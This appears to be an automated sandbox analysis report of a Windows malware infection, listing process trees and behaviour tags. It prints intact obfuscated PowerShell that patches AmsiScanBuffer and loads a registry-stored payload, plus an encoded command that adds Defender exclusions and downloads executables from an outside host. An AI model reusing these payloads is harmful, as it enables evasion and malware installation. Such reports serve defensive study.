PID 4900 wrote to memory of 4848 4900 new2.exe cmd.exe PID 4900 wrote to memory of 4848 4900 new2.exe cmd.exe PID 4848 wrote to memory of 3632 4848 cmd.exe WMIC.exe PID 4848 wrote to memory of 3632 4848 cmd.exe WMIC.exe PID 4408 wrote to memory of 1904 4408 cmd.exe sc.exe PID 4408 wrote to memory of 1904 4408 cmd.exe sc.exe PID 4408 wrote to memory of 3988 4408 cmd.exe sc.exe PID 4408 wrote to memory of 3988 4408 cmd.exe sc.exe PID 4408 wrote to memory of 2312 4408 cmd.exe sc.exe PID 4408 wrote to memory of 2312 4408 cmd.exe sc.exe PID 4408 wrote to memory of 3376 4408 cmd.exe sc.exe PID 4408 wrote to memory of 3376 4408 cmd.exe sc.exe PID 4408 wrote to memory of 2176 4408 cmd.exe sc.exe PID 4408 wrote to memory of 2176 4408 cmd.exe sc.exe PID 4408 wrote to memory of 1548 4408 cmd.exe reg.exe PID 4408 wrote to memory of 1548 4408 cmd.exe reg.exe PID 4408 wrote to memory of 2128 4408 cmd.exe reg.exe PID 4408 wrote to memory of 2128 4408 cmd.exe reg.exe PID 4408 wrote to memory of 4044 4408 cmd.exe reg.exe PID 4408 wrote to memory of 4044 4408 cmd.exe reg.exe PID 4408 wrote to memory of 1956 4408 cmd.exe reg.exe PID 4408 wrote to memory of 1956 4408 cmd.exe reg.exe PID 4408 wrote to memory of 4468 4408 cmd.exe reg.exe PID 4408 wrote to memory of 4468 4408 cmd.exe reg.exe PID 2072 wrote to memory of 3864 2072 SmartDefRun.exe dialer.exe PID 5072 wrote to memory of 4716 5072 powershell.EXE dllhost.exe PID 5072 wrote to memory of 4716 5072 powershell.EXE dllhost.exe PID 5072 wrote to memory of 4716 5072 powershell.EXE dllhost.exe PID 5072 wrote to memory of 4716 5072 powershell.EXE dllhost.exe PID 5072 wrote to memory of 4716 5072 powershell.EXE dllhost.exe PID 5072 wrote to memory of 4716 5072 powershell.EXE dllhost.exe PID 5072 wrote to memory of 4716 5072 powershell.EXE dllhost.exe PID 5072 wrote to memory of 4716 5072 powershell.EXE dllhost.exe PID 5072 wrote to memory of 4716 5072 powershell.EXE dllhost.exe PID 4716 wrote to memory of 608 4716 dllhost.exe winlogon.exe PID 4716 wrote to memory of 660 4716 dllhost.exe lsass.exe PID 4716 wrote to memory of 940 4716 dllhost.exe svchost.exe PID 4716 wrote to memory of 1012 4716 dllhost.exe dwm.exe PID 4716 wrote to memory of 444 4716 dllhost.exe svchost.exe PID 4716 wrote to memory of 672 4716 dllhost.exe svchost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{17ef512c-24b5-4767-9aa7-f03356067398}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:DLkuzxpiwtMo{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$XggOdaduqXRUQk,[Parameter(Position=1)][Type]$nfmoAraTpC)$oqNUgFKcSVN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+'l'+'e'+'c'+'t'+[Char](101)+''+[Char](100)+''+'D'+''+'e'+''+'l'+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+''+'m'+''+[Char](111)+'ry'+'M'+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+'e'+'l'+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+''+'T'+''+'y'+''+[Char](112)+''+'e'+'',''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+','+''+'S'+''+[Char](101)+''+'a'+'l'+'e'+''+'d'+''+[Char](44)+'A'+'n'+'s'+[Char](105)+'C'+[Char](108)+''+'a'+''+[Char](115)+''+'s'+','+'A'+''+[Char](117)+'t'+'o'+''+'C'+'l'+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$oqNUgFKcSVN.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+'i'+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+'e'+''+','+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+'g'+''+','+''+'P'+'u'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$XggOdaduqXRUQk).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'i'+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+'ag'+[Char](101)+''+'d'+'');$oqNUgFKcSVN.DefineMethod('I'+'n'+'v'+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+''+'u'+''+'b'+''+'l'+''+'i'+''+[Char](99)+''+','+'H'+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+'N'+'e'+''+[Char](119)+''+'S'+''+'l'+''+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+'rt'+[Char](117)+'a'+[Char](108)+'',$nfmoAraTpC,$XggOdaduqXRUQk).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+'ti'+'m'+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+'n'+'a'+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $oqNUgFKcSVN.CreateType();}$wPJbanBgSZvGk=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+'s'+''+[Char](116)+''+'e'+''+[Char](109)+''+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+'o'+[Char](102)+''+'t'+''+[Char](46)+'W'+'i'+''+[Char](110)+'3'+[Char](50)+''+'.'+''+[Char](85)+'n'+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'w'+'P'+''+[Char](74)+''+[Char](98)+''+'a'+'n'+[Char](66)+'g'+[Char](83)+''+[Char](90)+''+'v'+''+'G'+'k');$MmewoHmCKMDcqw=$wPJbanBgSZvGk.GetMethod(''+[Char](77)+''+[Char](109)+''+[Char](101)+''+'w'+'oHm'+'C'+''+[Char](75)+''+[Char](77)+''+[Char](68)+''+[Char](99)+''+[Char](113)+''+[Char](119)+'',[Reflection.BindingFlags]''+[Char](80)+''+[Char](117)+'b'+'l'+''+'i'+''+[Char](99)+','+[Char](83)+''+[Char](116)+'at'+[Char](105)+''+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$GkxdnnHWwGBFWcLtjmU=DLkuzxpiwtMo @([String])([IntPtr]);$JgYCiRduopqWbPjCDXmkhB=DLkuzxpiwtMo @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$lChRAAsfBzV=$wPJbanBgSZvGk.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+'d'+''+'u'+'l'+'e'+''+[Char](72)+''+[Char](97)+''+'n'+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+'r'+''+'n'+''+'e'+''+[Char](108)+'3'+[Char](50)+''+'.'+''+[Char](100)+'l'+'l'+'')));$tfaaJlsLQegmFT=$MmewoHmCKMDcqw.Invoke($Null,@([Object]$lChRAAsfBzV,[Object](''+'L'+''+[Char](111)+''+[Char](97)+'d'+[Char](76)+''+'i'+''+[Char](98)+''+'r'+'a'+[Char](114)+'yA')));$qNMeBJomjoRZIOYmt=$MmewoHmCKMDcqw.Invoke($Null,@([Object]$lChRAAsfBzV,[Object](''+'V'+''+'i'+''+'r'+''+[Char](116)+'u'+[Char](97)+''+'l'+''+[Char](80)+''+'r'+'o'+'t'+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$sSCAUEk=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tfaaJlsLQegmFT,$GkxdnnHWwGBFWcLtjmU).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+'i'+''+[Char](46)+'d'+'l'+''+'l'+'');$GKDuPhgCSaxJJoCrS=$MmewoHmCKMDcqw.Invoke($Null,@([Object]$sSCAUEk,[Object](''+[Char](65)+''+'m'+''+[Char](115)+'i'+'S'+''+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+'f'+[Char](101)+''+'r'+'')));$VnzVrGVOha=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qNMeBJomjoRZIOYmt,$JgYCiRduopqWbPjCDXmkhB).Invoke($GKDuPhgCSaxJJoCrS,[uint32]8,4,[ref]$VnzVrGVOha);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$GKDuPhgCSaxJJoCrS,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qNMeBJomjoRZIOYmt,$JgYCiRduopqWbPjCDXmkhB).Invoke($GKDuPhgCSaxJJoCrS,[uint32]8,0x20,[ref]$VnzVrGVOha);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+[Char](84)+''+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+'d'+'i'+'a'+''+'l'+'e'+'r'+''+[Char](115)+''+[Char](116)+''+'a'+''+[Char](103)+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:lUMyxnEmdpes{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$xokQuBiuYyuHOx,[Parameter(Position=1)][Type]$JRWbhSGzjC)$tpYAgLqdCQc=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+'f'+'l'+'e'+'c'+[Char](116)+''+[Char](101)+''+[Char](100)+''+'D'+''+'e'+''+'l'+''+'e'+''+[Char](103)+'ate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'nM'+[Char](101)+''+'m'+'o'+'r'+''+'y'+''+'M'+''+[Char](111)+'dul'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e'+[Char](84)+''+[Char](121)+''+'p'+''+'e'+'',''+[Char](67)+'l'+[Char](97)+'ss'+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+'S'+'e'+''+[Char](97)+'led'+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+'i'+''+'C'+''+'l'+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+'uto'+[Char](67)+''+[Char](108)+'a'+'s'+'s',[MulticastDelegate]);$tpYAgLqdCQc.DefineConstructor('R'+[Char](84)+''+'S'+''+[Char](112)+''+'e'+''+[Char](99)+'i'+[Char](97)+''+[Char](108)+'Na'+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+'i'+[Char](103)+''+[Char](44)+'Pu'+[Char](98)+''+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$xokQuBiuYyuHOx).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'t'+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+'n'+'ag'+'e'+''+[Char](100)+'');$tpYAgLqdCQc.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+'P'+'u'+[Char](98)+''+[Char](108)+'i'+'c'+''+[Char](44)+''+'H'+'i'+[Char](100)+'e'+'B'+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+'e'+''+[Char](119)+'Sl'+[Char](111)+''+[Char](116)+''+[Char](44)+'V'+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$JRWbhSGzjC,$xokQuBiuYyuHOx).SetImplementationFlags('R'+[Char](117)+''+'n'+'t'+[Char](105)+''+[Char](109)+''+'e'+','+[Char](77)+'a'+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $tpYAgLqdCQc.CreateType();}$kZIqmrxZnntms=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'ys'+[Char](116)+'em'+'.'+''+[Char](100)+'l'+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+'cr'+'o'+''+[Char](115)+'o'+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+'a'+[Char](102)+''+'e'+''+'k'+'ZI'+'q'+''+'m'+''+[Char](114)+''+[Char](120)+'Znn'+[Char](116)+''+[Char](109)+''+[Char](115)+'');$DlaEXldVDwkgwK=$kZIqmrxZnntms.GetMethod(''+[Char](68)+''+[Char](108)+''+'a'+''+[Char](69)+''+[Char](88)+'l'+'d'+'V'+[Char](68)+'w'+'k'+''+[Char](103)+''+[Char](119)+'K',[Reflection.BindingFlags]''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+',S'+[Char](116)+''+[Char](97)+''+'t'+''+[Char](105)+''+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$wsqHfBvvsUVVNrpgllh=lUMyxnEmdpes @([String])([IntPtr]);$urMJHSoxhPbQxyNtWxgTtK=lUMyxnEmdpes @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$UvheDItPyQA=$kZIqmrxZnntms.GetMethod(''+[Char](71)+''+'e'+'t'+[Char](77)+'o'+[Char](100)+'u'+[Char](108)+'eH'+'a'+''+'n'+''+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+'r'+''+'n'+''+'e'+''+[Char](108)+''+'3'+''+[Char](50)+''+[Char](46)+''+'d'+''+'l'+''+'l'+'')));$nuGiFVUpuhLExh=$DlaEXldVDwkgwK.Invoke($Null,@([Object]$UvheDItPyQA,[Object](''+[Char](76)+'o'+'a'+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+'r'+'a'+''+'r'+'y'+'A'+'')));$hxVzCbsBiJdyqmTUF=$DlaEXldVDwkgwK.Invoke($Null,@([Object]$UvheDItPyQA,[Object](''+[Char](86)+''+'i'+'r'+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+'o'+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$WyyYQyN=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nuGiFVUpuhLExh,$wsqHfBvvsUVVNrpgllh).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$oUfgZrYQkrNpmoMhm=$DlaEXldVDwkgwK.Invoke($Null,@([Object]$WyyYQyN,[Object](''+[Char](65)+'m'+[Char](115)+''+'i'+''+[Char](83)+''+'c'+''+[Char](97)+''+[Char](110)+''+[Char](66)+'u'+[Char](102)+'f'+[Char](101)+''+'r'+'')));$RbzvxCRaEG=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hxVzCbsBiJdyqmTUF,$urMJHSoxhPbQxyNtWxgTtK).Invoke($oUfgZrYQkrNpmoMhm,[uint32]8,4,[ref]$RbzvxCRaEG);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$oUfgZrYQkrNpmoMhm,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hxVzCbsBiJdyqmTUF,$urMJHSoxhPbQxyNtWxgTtK).Invoke($oUfgZrYQkrNpmoMhm,[uint32]8,0x20,[ref]$RbzvxCRaEG);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+'E').GetValue(''+[Char](100)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+'r'+''+'s'+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exeC:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe2⤵
- Executes dropped EXE
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\sihost.exesihost.exe1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s W32Time1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4892 -ip 48922⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 452 -p 3524 -ip 35242⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 516 -p 3656 -ip 36562⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 540 -p 2000 -ip 20002⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 564 -p 4776 -ip 47762⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 524 -p 2416 -ip 24162⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 608 -p 4772 -ip 47722⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 612 -p 2464 -ip 24642⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 520 -p 216 -ip 2162⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 608 -p 3632 -ip 36322⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 564 -p 5052 -ip 50522⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 568 -p 4160 -ip 41602⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 564 -p 4188 -ip 41882⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 568 -p 3760 -ip 37602⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 468 -p 3820 -ip 38202⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 624 -p 2656 -ip 26562⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 468 -p 2428 -ip 24282⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3656 -s 4042⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3524 -s 8562⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAZgBuACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQB1AHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcgBuAHkAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZQBlAG4AIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwB5AHYAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHYAaQBoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAZgBxACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwBoAGMAcQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGcAcwB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagBwAG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBzAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBqAHYAeAAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBxAHkAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAdAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGkAeQBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAGUAaABkACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBiAHgAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAYwBiACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAZwBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwB1AHIAZAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB0AGoAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoAC